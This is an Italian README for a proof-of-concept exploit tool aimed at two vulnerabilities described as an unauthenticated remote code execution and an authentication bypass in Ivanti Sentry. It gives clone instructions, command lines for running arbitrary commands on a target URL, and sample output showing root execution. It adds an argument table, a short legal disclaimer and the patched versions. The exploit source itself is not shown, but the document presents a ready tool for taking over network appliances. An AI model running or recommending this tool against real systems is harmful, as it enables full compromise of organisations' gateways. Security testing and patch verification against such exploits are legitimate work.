
CVE-2026-10520
Esecuzione Remota di Codice senza Autenticazione + Bypass dell'Autenticazione
Autore: Ashraf Zaryouh "0xBlackash"
Due vulnerabilità critiche che interessano Ivanti Sentry (precedentemente MobileIron Sentry):
Queste falle consentono a un attaccante non autenticato di compromettere totalmente il sistema.
python3 CVE-2026-10520.py --url <TARGET> --cmd <COMMAND>
# Utilizzo base
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "id"
# Modalità verbose
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "whoami" -v
# Con proxy
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a" --proxy 127.0.0.1:8080
# Controllo kernel
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a"
git clone https://github.com/0xBlackash/CVE-2026-10520.git
cd CVE-2026-10520
chmod +x CVE-2026-10520.py
Quando è vulnerabile, vedrai:
██████╗ ██╗ ██╗██████╗ ██╗ █████╗ ██████╗██╗ ██╗ █████╗ ███████╗██╗ ██╗
██╔═████╗╚██╗██╔╝██╔══██╗██║ ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║ ██║
██║██╔██║ ╚███╔╝ ██████╔╝██║ ███████║██║ █████╔╝ ███████║███████╗███████║
████╔╝██║ ██╔██╗ ██╔══██╗██║ ██╔══██║██║ ██╔═██╗ ██╔══██║╚════██║██╔══██║
╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║ ██║╚██████╗██║ ██╗██║ ██║███████║██║ ██║
╚═════╝ ╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
CVE-2026-10520 & CVE-2026-10523 PoC Exploit
Ivanti Sentry Pre-Auth RCE + Auth Bypass
Author: Ashraf Zaryouh "0xBlackash"
GitHub: https://github.com/0xBlackash
[+] Target is VULNERABLE!
Command Output:
uid=0(root) gid=0(root) groups=0(root)
Questo strumento è solo per test di sicurezza educativi e autorizzati.
L'uso non autorizzato contro sistemi di cui non si è proprietari è illegale.
L'autore non si assume alcuna responsabilità per un uso improprio.
Corretto in: 10.5.2 / 10.6.2 / 10.7.1
Realizzato con ❤️ da Ashraf Zaryouh "0xBlackash"
Metti una stella al repository se lo hai trovato utile! ⭐
| Argomento | Descrizione | Obbligatorio |
|---|
--url | URL del target (es. https://target:8443) | Sì |
--cmd | Comando da eseguire | Sì |
-v, --verbose | Abilita output verbose | No |
--proxy | Proxy HTTP (host:porta) | No |